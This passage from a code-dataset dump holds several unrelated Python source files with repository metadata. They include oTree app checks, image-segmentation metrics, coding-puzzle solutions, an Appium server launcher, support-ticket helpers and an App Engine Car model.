'\r\n )\r\n numeric_id=29\r\n\r\n fmt_kwargs = {\r\n 'ViewClsName': ViewCls.__name__,\r\n 'FLAG': ALLOW_CUSTOM_ATTRIBUTES,\r\n 'member': member,\r\n }\r\n # when i make this an error, should add this workaround.\r\n #msg += 'If you want to keep it here, you need to set '\r\n # '{FLAG}=True on the page class.'\r\n\r\n # at first, just make it a warning.\r\n helper.add_error(msg.format(**fmt_kwargs), numeric_id)\r\n\r\n\r\ndef unique_sessions_names(helper: AppCheckHelper, **kwargs):\r\n already_seen = set()\r\n for st in settings.SESSION_CONFIGS:\r\n st_name = st[\"name\"]\r\n if st_name in already_seen:\r\n msg = \"Duplicate SESSION_CONFIG name '{}'\".format(st_name)\r\n helper.add_error(msg, numeric_id=40)\r\n else:\r\n already_seen.add(st_name)\r\n\r\n\r\ndef unique_room_names(helper: AppCheckHelper, **kwargs):\r\n already_seen = set()\r\n for room in getattr(settings, 'ROOMS', []):\r\n room_name = room[\"name\"]\r\n if room_name in already_seen:\r\n msg = \"Duplicate ROOM name '{}'\".format(room_name)\r\n helper.add_error(msg, numeric_id=50)\r\n else:\r\n already_seen.add(room_name)\r\n\r\n\r\ndef template_encoding(helper: AppCheckHelper, **kwargs):\r\n from otree.checks.templates import has_valid_encoding\r\n for template_name in helper.get_template_names():\r\n if not has_valid_encoding(template_name):\r\n helper.add_error(\r\n 'The template {template} is not UTF-8 encoded. '\r\n 'Please configure your text editor to always save files '\r\n 'as UTF-8. Then open the file and save it again.'\r\n .format(template=helper.get_rel_path(template_name)),\r\n numeric_id=60,\r\n )\r\n\r\n\r\ndef make_check_function(func):\r\n def check_function(app_configs, **kwargs):\r\n # if app_configs list is given (e.g. otree check app1 app2), run on those\r\n # if it's None, run on all apps\r\n # (system check API requires this)\r\n app_configs = app_configs or _get_all_configs()\r\n errors = []\r\n for app_config in app_configs:\r\n helper = AppCheckHelper(app_config, errors)\r\n func(helper, **kwargs)\r\n return errors\r\n\r\n return check_function\r\n\r\n\r\ndef make_check_function_run_once(func):\r\n def check_function(app_configs, **kwargs):\r\n otree_app_config = apps.get_app_config('otree')\r\n # ignore app_configs list -- just run once\r\n errors = []\r\n helper = AppCheckHelper(otree_app_config, errors)\r\n func(helper, **kwargs)\r\n return errors\r\n\r\n return check_function\r\n\r\n\r\ndef register_system_checks():\r\n for func in [\r\n unique_room_names,\r\n unique_sessions_names,\r\n ]:\r\n check_function = make_check_function_run_once(func)\r\n register(check_function)\r\n\r\n for func in [\r\n model_classes,\r\n files,\r\n constants,\r\n pages_function,\r\n template_encoding,\r\n ]:\r\n check_function = make_check_function(func)\r\n register(check_function)\r\n","repo_name":"dcthomas4679/otree","sub_path":"checks/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":18602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"19022853203","text":"\"\"\"\n Refering to a \"User\" in a chatting platform.\n\"\"\"\n\n\nclass User:\n\n \"\"\"\n uid: str (some platform may not be pure number)\n name: str\n \"\"\"\n\n def __init__(self, uid = \"\", name = \"\"):\n self.uid = uid\n self.name = name\n\n \n def __eq__(self, other: \"User\"):\n if self is None and other is None:\n return True\n\n if self is None or other is None:\n return False\n \n return self.uid == other.uid","repo_name":"SiriusNEO/Moment","sub_path":"core/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"7306827201","text":"from collections import defaultdict\n\nfrom scipy import spatial\nimport numpy as np\nimport torch.nn.functional as F\nimport torch\nfrom torch import einsum\ndef dice_score_2(prediction, groundtruth):\n prediction = torch.tensor(prediction)\n groundtruth = torch.tensor(groundtruth)\n\n prediction = prediction.clone().detach()\n groundtruth = groundtruth.clone().detach()\n\n inter = prediction*groundtruth\n union = prediction*prediction + groundtruth*groundtruth\n iflat = inter.flatten().sum()\n uflat = union.flatten().sum()\n if (uflat != 0):\n d = 200*(np.float(iflat)/uflat)\n if (uflat == 0):\n d = 100\n return d\ndef threshold_predictions(predictions, thr=0.999):\n thresholded_preds = predictions[:]\n low_values_indices = thresholded_preds < thr\n thresholded_preds[low_values_indices] = 0\n low_values_indices = thresholded_preds >= thr\n thresholded_preds[low_values_indices] = 1\n return thresholded_preds\n\ndef intersection(a, b):\n assert a.shape == b.shape\n assert sset(a, [0, 1])\n assert sset(b, [0, 1])\n return a & b\n\n\ndef union(a, b):\n assert a.shape == b.shape\n assert sset(a, [0, 1])\n assert sset(b, [0, 1])\n return a | b\n\ndef probs2class(probs):\n b, _, w, h = probs.shape # type: Tuple[int, int, int, int]\n assert simplex(probs)\n\n res = probs.argmax(dim=1)\n assert res.shape == (b, w, h)\n\n return res\n\n\n\ndef class2one_hot(seg, C):\n if len(seg.shape) == 2: # Only w, h, used by the dataloader\n seg = seg.unsqueeze(dim=0)\n assert sset(seg, list(range(C)))\n\n b, w, h = seg.shape # type: Tuple[int, int, int]\n\n res = torch.stack([seg == c for c in range(C)], dim=1).type(torch.int32)\n assert res.shape == (b, C, w, h)\n assert one_hot(res)\n\n return res\n\ndef probs2one_hot(probs):\n _, C, _, _ = probs.shape\n assert simplex(probs)\n\n res = class2one_hot(probs2class(probs), C)\n assert res.shape == probs.shape\n assert one_hot(res)\n\n return res\n\n\ndef sset(a, sub):\n #print(uniq(a))\n #print(sub)\n return uniq(a).issubset(sub)\n\n\ndef eq(a, b):\n return torch.eq(a, b).all()\n\n\ndef simplex(t, axis=1):\n _sum = t.sum(axis).type(torch.float32)\n #print(_sum.sum())\n _ones = torch.ones_like(_sum, dtype=torch.float32)\n #print(_ones.sum())\n return _ones.sum() == _sum.sum()\n\ndef uniq(a):\n return set(torch.unique(a.cpu()).numpy())\n\ndef one_hot(t, axis=1):\n #print(simplex(t, axis))\n #print(sset(t, [0, 1]))\n return simplex(t, axis) and sset(t, [0, 1])\n\ndef meta_dice(sum_str, label, pred, smooth = 1e-8):\n assert label.shape == pred.shape\n assert one_hot(pred.detach())\n\n inter_size: Tensor = einsum(sum_str, [intersection(label, pred)]).type(torch.float32)\n sum_sizes: Tensor = (einsum(sum_str, [label]) + einsum(sum_str, [pred])).type(torch.float32)\n\n dices: Tensor = (2 * inter_size + smooth) / (sum_sizes + smooth)\n\n return dices\n\n\n\nclass MetricManager(object):\n def __init__(self, metric_fns):\n self.metric_fns = metric_fns\n self.result_dict = defaultdict(float)\n self.num_samples = 0 \n \n def __call__(self, prediction, ground_truth):\n self.num_samples += len(prediction)\n for metric_fn in self.metric_fns:\n for p, gt in zip(prediction, ground_truth):\n res = metric_fn(p, gt)\n dict_key = metric_fn.__name__\n self.result_dict[dict_key] += res\n \n def get_results(self):\n res_dict = {}\n for key, val in self.result_dict.items():\n res_dict[key] = val / self.num_samples\n return res_dict\n \n def reset(self):\n self.num_samples = 0\n self.result_dict = defaultdict(float)\n \n\ndef numeric_score(prediction, 
groundtruth):\n \"\"\"Computation of statistical numerical scores:\n\n * FP = False Positives\n * FN = False Negatives\n * TP = True Positives\n * TN = True Negatives\n\n return: tuple (FP, FN, TP, TN)\n \"\"\"\n FP = np.float(np.sum((prediction == 1) & (groundtruth == 0)))\n FN = np.float(np.sum((prediction == 0) & (groundtruth == 1)))\n TP = np.float(np.sum((prediction == 1) & (groundtruth == 1)))\n TN = np.float(np.sum((prediction == 0) & (groundtruth == 0)))\n return FP, FN, TP, TN\n\ndef dice_per_organ(prediction, groundtruth, thresh):\n pred = prediction.detach().numpy()\n tr = groundtruth.detach().numpy()\n num = np.sum(pred*tr)\n s = np.sum(pred)\n '''\n if s < thresh:\n s = 0\n num = 0\n '''\n denum = s + np.sum(tr)\n if denum == 0 and num == 0:\n d = 1\n else:\n d = 2*(num/denum)\n return d\n\ndef jaccard_score(prediction, groundtruth):\n pflat = prediction.flatten()\n gflat = groundtruth.flatten()\n return (1 - spatial.distance.jaccard(pflat, gflat)) * 100.0\n\n\ndef hausdorff_score(prediction, groundtruth):\n return spatial.distance.directed_hausdorff(prediction, groundtruth)[0]\n\n\ndef precision_score(prediction, groundtruth):\n # PPV\n FP, FN, TP, TN = numeric_score(prediction, groundtruth)\n if (TP + FP) <= 0.0:\n return 0.0\n\n precision = np.divide(TP, TP + FP)\n return precision * 100.0\n\ndef dice_metric(input,target):\n \"\"\"\n input is a torch variable of size BatchxnclassesxHxW representing log probabilities for each class\n target is a 1-hot representation of the groundtruth, shoud have same size as the input\n \"\"\"\n assert input.size() == target.size(), \"Input sizes must be equal.\"\n uniques=np.unique(target.numpy())\n assert set(list(uniques))<=set([0,1]), \"target must only contain zeros and ones\"\n\n probs = input\n num=probs*target#b,c,h,w--p*g\n num=torch.sum(num,dim=3)#b,c,h\n num=torch.sum(num,dim=2)\n\n den1=probs*probs#--p^2\n den1=torch.sum(den1,dim=3)#b,c,h\n den1=torch.sum(den1,dim=2)\n\n den2=target*target#--g^2\n den2=torch.sum(den2,dim=3)#b,c,h\n den2=torch.sum(den2,dim=2)#b,c\n \n dice=np.squeeze(2*(num/(den1+den2)))\n \n if input.shape[1] != 1:\n for i, d in enumerate(dice):\n if np.isnan(d) == 1:\n dice[i] = 1\n else:\n if np.isnan(dice) == 1:\n dice = 1\n dice = torch.tensor(dice)\n\n # return dice.detach().numpy()[1:]\n return dice.detach().numpy()\n\ndef recall_score(prediction, groundtruth):\n # TPR, sensitivity\n FP, FN, TP, TN = numeric_score(prediction, groundtruth)\n if (TP + FN) <= 0.0:\n return 0.0\n TPR = np.divide(TP, TP + FN)\n return TPR * 100.0\n\n\ndef specificity_score(prediction, groundtruth):\n FP, FN, TP, TN = numeric_score(prediction, groundtruth)\n if (TN + FP) <= 0.0:\n return 0.0\n TNR = np.divide(TN, TN + FP)\n return TNR * 100.0\n\n\ndef intersection_over_union(prediction, groundtruth):\n FP, FN, TP, TN = numeric_score(prediction, groundtruth)\n if (TP + FP + FN) <= 0.0:\n return 0.0\n return TP / (TP + FP + FN) * 100.0\n\n\ndef accuracy_score(prediction, groundtruth):\n pred_thresh = threshold_predictions(prediction)\n FP, FN, TP, TN = numeric_score(pred_thresh, groundtruth)\n N = FP + FN + TP + TN\n accuracy = np.divide(TP + TN, N)\n return accuracy * 100.0\n\ndef compute_stats(metric, mean_prev, var_prev, n):\n '''\n computes the moving average of a metric \n @parameters:\n @metric = newest vaue to add\n @mean_prev = previous mean \n @var_prev = previous variance\n @n = current total number of samples\n '''\n if n > 1:\n mean_n = (1.00/n)*(metric + (n-1)*mean_prev)\n var_n = (np.float(n-2)/(n-1))*(var_prev) + 
(1.00/n)*(metric - mean_prev)**2\n else:\n mean_n = metric\n var_n = 0\n \n return mean_n, var_n\n \n \n \n \n \n \n","repo_name":"rosanajurdi/BB-UNet_UNet_with_bounding_box_prior","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":7713,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"2296640394","text":"def solution(park, routes):\n answer = []\n W, H = len(park[0]), len(park)\n for row, line in enumerate(park):\n if \"S\" in set(line):\n answer = [row, line.index(\"S\")]\n break\n \n for route in routes:\n op, n = route.split()\n n = int(n)\n if op == \"E\":\n if (answer[1] + n >= W) or (\"X\" in park[answer[0]][answer[1] + 1 : answer[1] + n + 1]): continue\n answer[1] += n\n elif op == \"W\":\n if (answer[1] - n < 0) or (\"X\" in park[answer[0]][answer[1] - n : answer[1]]): continue\n answer[1] -= n\n elif op == \"S\":\n target = list(zip(*park))[answer[1]]\n if (answer[0] + n >= H) or (\"X\" in target[answer[0] + 1 : answer[0] + n + 1]): continue\n answer[0] += n\n else:\n target = list(zip(*park))[answer[1]]\n if (answer[0] - n < 0) or (\"X\" in target[answer[0] - n : answer[0]]): continue\n answer[0] -= n\n \n return answer","repo_name":"N1ghtsky0/algorithm_study","sub_path":"프로그래머스/unrated/172928. 공원 산책/공원 산책.py","file_name":"공원 산책.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"19123752406","text":"import os\nimport socket\nimport subprocess\nfrom time import sleep\nimport multiprocessing\nimport yaml\nfrom time import ctime\n\nwith open('desired_caps.yaml', 'r') as file:\n data = yaml.load(file, Loader=yaml.FullLoader)\n\n\ndef appium_start_sync():\n '''并发启动appium服务'''\n print('====appium_start_sync=====')\n\n # 构建appium进程组\n appium_process = []\n\n # 加载appium进程\n\n for i in range(len(data['devices_list'].split(\",\"))):\n host = '127.0.0.1'\n port = 4723 + 2 * i\n\n appium = multiprocessing.Process(target=start_appium_action, args=(host, port))\n appium_process.append(appium)\n\n # 启动appium服务\n for appium in appium_process:\n appium.start()\n for appium in appium_process:\n appium.join()\n\n sleep(5)\n\n\ndef start_appium_action(host, port):\n '''检测端口是否被占用,如果没有被占用则启动appium服务'''\n if check_port(host, port):\n appium_start(host, port)\n else:\n print('appium %s start failed!' % port)\n release_port(port)\n\n return True\n\n\ndef check_port(host, port):\n \"\"\"检测指定的端口是否被占用\"\"\"\n\n # 创建socket对象\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.connect((host, port))\n s.shutdown(2)\n except OSError as msg:\n print('port %s is available! ' % port)\n print(msg)\n return True\n else:\n print('port %s already be in use !' % port)\n return False\n\n\ndef appium_start(host, port):\n '''启动appium server'''\n bootstrap_port = str(port + 1)\n cmd = 'start /b appium -a ' + host + ' -p ' + str(port) + ' -bp ' + str(bootstrap_port)\n\n print('%s at %s' % (cmd, ctime()))\n subprocess.Popen(cmd, shell=True, stdout=open('./appium_log/' + str(port) + '.log', 'a'), stderr=subprocess.STDOUT)\n\n\ndef release_port(port):\n \"\"\"释放指定的端口\"\"\"\n\n # 查找对应端口的pid\n cmd_find = 'netstat -aon | findstr %s' % port\n print(cmd_find)\n\n # 返回命令执行后的结果\n result = os.popen(cmd_find).read()\n print(result)\n\n if str(port) and 'LISTENING' in result:\n # 获取端口对应的pid进程\n i = result.index('LISTENING')\n start = i + len('LISTENING') + 7\n end = result.index('\\n')\n pid = result[start:end]\n\n # 关闭被占用端口的pid\n cmd_kill = 'taskkill -f -pid %s' % pid\n print(cmd_kill)\n os.popen(cmd_kill)\n\n else:\n print('port %s is available !' % port)\n\n\nif __name__ == '__main__':\n appium_start_sync()\n # for i in range(60):\n # release_port(i+4720)\n","repo_name":"dzh112/app_multi","sub_path":"APPIUM_MULTI/appium_multi.py","file_name":"appium_multi.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14228119258","text":"from collections import deque\nimport sys\n\n\ndef get_team(drawing):\n team = [[-1] * N for _ in range(N)]\n team_block_count = []\n team_block_value = []\n\n team_num = -1\n for r in range(N):\n for c in range(N):\n if team[r][c] == -1:\n team_num += 1\n team[r][c] = team_num\n draw_num = drawing[r][c]\n team_block_count.append(0)\n team_block_value.append(draw_num)\n\n queue = deque([[r, c]])\n while queue:\n cur_r, cur_c = queue.popleft()\n team_block_count[team_num] +=1\n for move in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n next_r, next_c = cur_r + move[0], cur_c + move[1]\n if next_r >= 0 and next_r < N and next_c >= 0 and next_c < N and drawing[next_r][next_c]==draw_num and team[next_r][next_c] == -1:\n team[next_r][next_c] = team_num\n queue.append([next_r, next_c])\n # print(team)\n return team_num+1, team, team_block_count, team_block_value\n\ndef get_score(team, total_team, team_block_count, team_block_value):\n team_adj = [[0]*total_team for _ in range(total_team)]\n\n for r in range(N):\n for c in range(N):\n cur_team = team[r][c]\n for move in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n next_r, next_c = r + move[0], c + move[1]\n if next_r >= 0 and next_r < N and next_c >= 0 and next_c < N :\n next_team = team[next_r][next_c]\n # print(cur_team, next_team)\n team_adj[cur_team][next_team] += 1\n\n total_score = 0\n for i in range(total_team):\n for j in range(i+1, total_team):\n total_score += (team_block_count[i] + team_block_count[j]) * team_block_value[i] * team_block_value[j] * team_adj[i][j]\n\n # print(\"score\", total_score)\n return total_score\n\ndef rotate_drawing(drawing):\n\n new_drawing = [[0]*N for _ in range(N)]\n mid = N//2\n\n # 십자 회전\n center_r, center_c = mid, mid\n for i in range(N):\n r, c = i, mid\n # 반시계 회전\n r1, c1 = -1*(c-center_c)+center_r, (r-center_r)+center_c\n new_drawing[r1][c1] = drawing[r][c]\n r, c = mid, i\n r2, c2 = -1*(c-center_c)+center_r, (r-center_r)+center_c\n new_drawing[r2][c2] = drawing[r][c]\n\n\n center_r, center_c = (N-mid)/2-1, (N-mid)/2-1\n # print(center_r, center_c)\n for i in range(mid):\n for j in range(mid):\n new_i, new_j = int((j-center_c)+center_r), int(-1*(i-center_r)+center_c)\n new_drawing[new_i][new_j] = drawing[i][j]\n\n center_r, center_c = (N - mid) / 2 + mid, (N - mid) / 2 + mid\n # print(center_r, center_c)\n for i in range(mid+1, N):\n for j in range(mid+1, N):\n new_i, new_j = int((j - center_c) + center_r), int(-1 * (i - center_r) + center_c)\n new_drawing[new_i][new_j] = drawing[i][j]\n\n center_r, center_c = (N - mid) / 2 + mid, (N-mid)/2-1\n for i in range(mid+1, N):\n for j in range(mid):\n new_i, new_j = int((j - center_c) + center_r), int(-1 * (i - center_r) + center_c)\n new_drawing[new_i][new_j] = drawing[i][j]\n\n center_r, center_c = (N-mid)/2-1, (N - mid) / 2 + mid\n for i in range(mid):\n for j in range(mid+1, N):\n new_i, new_j = int((j - center_c) + center_r), int(-1 * (i - center_r) + center_c)\n new_drawing[new_i][new_j] = drawing[i][j]\n\n # for center_r in range((N-mid))\n # for center_r, center_c in [()]\n # print(drawing)\n # print(new_drawing)\n\n # print(-1*(c-center_c)+center_r, (r-center_r)+center_c)\n # print((c-center_c)+center_r, -1*(r-center_r)+center_c)\n\n return new_drawing\n\n\nif __name__ == \"__main__\":\n sys.stdin = open(\"../input.txt\", \"r\")\n N = int(sys.stdin.readline())\n drawing = [list(map(int, sys.stdin.readline().split(\" \"))) for _ in range(N)]\n # N = (int)input()\n # drawing = [list(map(int, input().split(\" \"))) for _ in 
range(N)]\n\n total_score = 0\n for _ in range(4):\n total_team_num, team_map, team_block_count, team_block_value = get_team(drawing)\n total_score+=get_score(team_map, total_team_num, team_block_count, team_block_value)\n drawing = rotate_drawing(drawing)\n\n print(total_score)","repo_name":"suuuuuuuubin/Algo_Study","sub_path":"CodeTree/예술성_2022상반기오전2번.py","file_name":"예술성_2022상반기오전2번.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30473045398","text":"import sys\nsys.stdin = open(\"input.txt\", \"r\")\n\nT = int(input())\n\nfor ts in range(1, T+1):\n arr = [list(map(int, input().split())) for _ in range(9)]\n ans = 1\n\n #세칸씩\n for n in range(0, len(arr), 3):\n for i in range(3):\n num = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0}\n for j in range(3):\n one_line = arr[n + j][i * 3:(i + 1) * 3]\n for k in one_line:\n if num[k] == 0:\n num[k] = 1\n else:\n ans = 0\n break\n #가로\n for i in range(9):\n if len(set(arr[i])) != 9:\n ans = 0\n break\n #세로\n arr2 = list(zip(*arr))\n for i in range(9):\n num = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0}\n for j in range(9):\n if num[arr2[i][j]] == 0:\n num[arr2[i][j]] = 1\n else:\n ans = 0\n\n print(f'#{ts} {ans}')","repo_name":"younga-Lee/TIL","sub_path":"ssafy9_1/swea/D2/1974 스도쿠 검증.py","file_name":"1974 스도쿠 검증.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"37515847305","text":"from typing import Dict, List\n\nfrom pydantic import BaseModel, Field\n\nfrom common.utils.enums import PhaseLabels\nfrom entities.Multiflash import (\n ComponentFractions,\n Multiflash,\n MultiflashResult,\n PhaseValues,\n)\n\n\nclass MultiflashResponse(BaseModel):\n phase_values: Dict[PhaseLabels, Dict[str, float]] = Field(\n ...,\n description=\"Phase labels (vapor, liquid, aqueous, mercury) with \"\n \"their fraction of unity and mercury concentration\",\n alias=\"phaseValues\",\n )\n component_fractions: Dict[str, List[float]] = Field(\n ...,\n description=\"Mole fractions of each of the components (Note: mass is discarded from MultiflashResult)\",\n alias=\"componentFractions\",\n )\n feed_fractions: Dict[str, float] = Field(\n ..., description=\"Ratio of components in the feed (guaranteed to sum to 1)\", alias=\"feedFractions\"\n )\n\n class Config:\n allow_mutation = False\n allow_population_by_field_name = True\n schema_extra = {\n \"example\": {\n \"phaseValues\": {\n \"Mercury\": {\"percentage\": 0.13710670215621407, \"mercury\": 1000000000},\n \"Vapor\": {\"percentage\": 0.5923732280108018, \"mercury\": 3426.2630579508586},\n \"Aqueous\": {\"percentage\": 0.2705200698329841, \"mercury\": 82.76725027120922},\n },\n \"componentFractions\": {\n \"1\": [3.153640195684568e-23, 0.17798810356465122, 0.001283168757794131],\n \"2\": [8.232685472278065e-23, 0.42824009015281783, 0.00007363513673381724],\n \"3\": [6.089783280850285e-25, 0.0035486377271550557, 0.9984849101778882],\n \"5\": [1.0000000000000002, 4.038754670974074e-7, 7.447270506156235e-9],\n \"101\": [7.260898200622709e-23, 0.390222764679909, 0.00015827848031333905],\n },\n \"feedFractions\": {\"1\": 0.1057, \"2\": 0.2535, \"3\": 0.2720, \"101\": 0.23102, \"5\": 0.137},\n }\n }\n\n @classmethod\n def from_values(\n cls,\n phase_values: Dict[PhaseLabels, PhaseValues],\n component_fractions: Dict[str, ComponentFractions],\n feed_fractions: List[float],\n ) -> \"MultiflashResponse\":\n # convert phase_values to dictionary\n new_phase_values = {label: value._asdict() for label, value in phase_values.items()}\n # convert component_fraction to dictionary with lists (not numpy arrays):\n new_component_fractions = {\n component_id: component_fractions[component_id].moles.tolist()\n for component_id in component_fractions.keys()\n }\n # feed fractions to dictionary:\n new_feed_fractions = {\n component_id: feed_ratio for component_id, feed_ratio in zip(component_fractions.keys(), feed_fractions)\n }\n return MultiflashResponse(\n phase_values=new_phase_values,\n component_fractions=new_component_fractions,\n feed_fractions=new_feed_fractions,\n )\n\n @property\n def phase_labels(self) -> List[PhaseLabels]:\n return list(self.phase_values.keys())\n\n @property\n def phase_fractions(self) -> List[float]:\n return [value[\"percentage\"] for key, value in self.phase_values.items()]\n\n\ndef compute_multiflash_use_case(multiflash: Multiflash) -> MultiflashResponse:\n multiflash_result: MultiflashResult = multiflash.compute()\n return MultiflashResponse.from_values(*multiflash_result)\n","repo_name":"equinor/mercury","sub_path":"api/src/features/multiflash/multiflash_use_case.py","file_name":"multiflash_use_case.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"31476003827","text":"from datetime import datetime\n\nfrom bot import db_session\nfrom models.support import SupportTicket\n\n\ndef create_support_ticket(ticket_type: str, chat: bool, submit_user: str, anonymous: bool, description: str,\n notification_id: str):\n ticket = SupportTicket()\n ticket.ticket_type = ticket_type\n ticket.chat = chat\n ticket.submit_user = submit_user\n ticket.anonymous = anonymous\n ticket.description = description\n ticket.notification_id = notification_id\n ticket.created_at = datetime.now()\n ticket.status = 'NEW'\n db_session.add(ticket)\n db_session.commit()\n\n\ndef get_support_by_notification_id(notification_id: str) -> SupportTicket:\n ticket = db_session.query(SupportTicket).filter(SupportTicket.notification_id == notification_id).first()\n return ticket\n\n\ndef get_support_by_channel_id(support_channel: int) -> SupportTicket:\n ticket = db_session.query(SupportTicket).filter(SupportTicket.support_channel == str(support_channel)).first()\n return ticket\n\n\ndef update_support_status(ticket_id: int, status: str, support_channel: int = None):\n ticket = db_session.query(SupportTicket).filter(SupportTicket.ticket_id == str(ticket_id)).first()\n ticket.status = status\n if status == 'RESOLVED':\n ticket.resolved_at = datetime.now()\n if support_channel:\n ticket.support_channel = str(support_channel)\n db_session.commit()\n\n\ndef get_open_support_tickets():\n tickets = db_session.query(SupportTicket).filter(SupportTicket.support_channel != None and SupportTicket.status !=\n 'RESOLVED').all()\n return tickets\n","repo_name":"rude-jerk/tea-bot","sub_path":"utils/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72160476380","text":"import pak\n\nfrom public import public\n\nfrom aioconsole import aprint\n\nfrom .proxy import Proxy\n\nfrom ..packets import Packet, ServerboundPacket\n\n@public\nclass LoggingProxy(Proxy):\n LOG_GENERIC_PACKETS = True\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n if self.LOG_GENERIC_PACKETS:\n self.register_packet_listener(self._log_packet, Packet)\n else:\n self.register_packet_listener(self._log_specific_packets, Packet)\n\n async def _log_packet(self, source, packet):\n if isinstance(packet, ServerboundPacket):\n bound = \"Serverbound\"\n else:\n bound = \"Clientbound\"\n\n if source.is_satellite:\n connection = \"SATELLITE\"\n else:\n connection = \"MAIN\"\n\n await aprint(f\"{connection}: {bound}: {packet}\")\n\n async def _log_specific_packets(self, source, packet):\n if isinstance(packet, pak.GenericPacket):\n return\n\n await self._log_packet(source, packet)\n","repo_name":"friedkeenan/caseus","sub_path":"caseus/proxies/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"39712977509","text":"import time\nstart_time=time.time()\nframe_count=0\nfps_streams={}\n\nclass GETFPS:\n def __init__(self,stream_id):\n global start_time\n self.start_time=start_time\n self.is_first=True\n global frame_count\n self.frame_count=frame_count\n self.stream_id=stream_id\n def get_fps(self):\n end_time=time.time()\n if(self.is_first):\n self.start_time=end_time\n self.is_first=False\n if(end_time-self.start_time>5):\n print(\"**********************FPS*****************************************\")\n print(\"Fps of stream\",self.stream_id,\"is \", float(self.frame_count)/5.0)\n self.frame_count=0\n self.start_time=end_time\n else:\n self.frame_count=self.frame_count+1\n def print_data(self):\n print('frame_count=',self.frame_count)\n print('start_time=',self.start_time)\n\nclass Timer:\n def __init__(self, source_number):\n for i in range(0,source_number):\n fps_streams[\"stream{0}\".format(i)]=GETFPS(i)\n def get_stream_fps(index):\n return fps_streams[\"stream{0}\".format(index)]\n\n\n","repo_name":"zhouyuchong/deepstream-kit","sub_path":"utils/fps.py","file_name":"fps.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"7123958435","text":"import sys\nfrom setting import static_variable\n\n__author__ = 'Nazzareno'\n\nfrom Class.position import Position\n\nimport logging\nimport time\nimport datetime\n\nfrom Cloud_Storage.user_car import User_car\nfrom Cloud_Storage.user import User\n\nfrom google.appengine.ext import ndb\n\n\nclass Car(ndb.Model):\n brand = ndb.StringProperty()\n latitude = ndb.StringProperty()\n longitude = ndb.StringProperty()\n timestamp = ndb.StringProperty()\n bluetooth_MAC = ndb.StringProperty()\n bluetooth_name = ndb.StringProperty()\n name = ndb.StringProperty()\n email = ndb.StringProperty()\n register = ndb.StringProperty()\n lastdriver = ndb.StringProperty()\n isParked = ndb.BooleanProperty()\n uuid = ndb.StringProperty()\n bmaj = ndb.StringProperty()\n bmin = ndb.StringProperty()\n marker_color = ndb.FloatProperty()\n\n def getPositionFromID(self):\n result = Position(self.latitude, self.longitude)\n return result\n\n def updatePosition(self, latitude, longitude, lastdriver):\n self.latitude = latitude\n self.longitude = longitude\n self.lastdriver = lastdriver\n\n st = str(datetime.datetime.utcnow() + datetime.timedelta(hours=1))\n\n self.timestamp = st\n self.isParked = True\n self.put()\n return 0\n\n def updateParked(self):\n self.isParked = False\n self.put()\n return 0\n\n def to_string_json_car(self):\n car_users = []\n id_users = User_car.getUserFromCar(self.key.id())\n for id_user in id_users:\n user = User.get_user_by_id(id_user.id_user)\n car_users.append(user.toString_JSON())\n return {\n \"ID_car\": str(self.key.id()), \"Brand\": str(self.brand), \"Name\": str(self.name),\n \"Latitude\": str(self.latitude),\n \"Longitude\": str(self.longitude), \"Users\": car_users, \"Timestamp\": str(self.timestamp),\n \"Register\": str(self.register), \"Last_driver\": str(self.lastdriver), \"isParked\": self.isParked,\n \"Bluetooth_MAC\": str(self.bluetooth_MAC), \"Bluetooth_Name\": str(self.bluetooth_name),\n \"UUID\": str(self.uuid), \"Bmin\": str(self.bmin), \"Bmaj\": str(self.bmaj),\n \"Marker_Color\": self.marker_color\n }\n\n @staticmethod\n def updateUUID(id,uuid, bmaj, bmin):\n temp_car = Car.getCarbyID(id)\n temp_car.bmaj = bmaj\n temp_car.bmin = bmin\n temp_car.uuid = uuid\n temp_car.put()\n return 0\n\n\n def update(self, bluetooth_MAC, bluetooth_name, brand, email, latitude, longitude, name, maker_color):\n self.latitude = latitude\n self.longitude = longitude\n self.bluetooth_MAC = bluetooth_MAC\n self.bluetooth_name = bluetooth_name\n self.brand = brand\n self.email = email\n self.name = name\n self.marker_color = maker_color\n self.put()\n return 0\n\n @staticmethod\n def getCarbyID(id):\n\n if static_variable.DEBUG and static_variable.DEBUG_ALL_CARS:\n logging.debug(\"Value ID: \"+str(id)+\" Cast a float: \"+str(\"%.0f\" % float(id)))\n\n app_key = Car.get_by_id(long(\"%.0f\" % float(id))) # This why sometime arrive id like '4.93745548034048E15'\n return app_key\n\n @staticmethod\n def get_json(id):\n app_key = 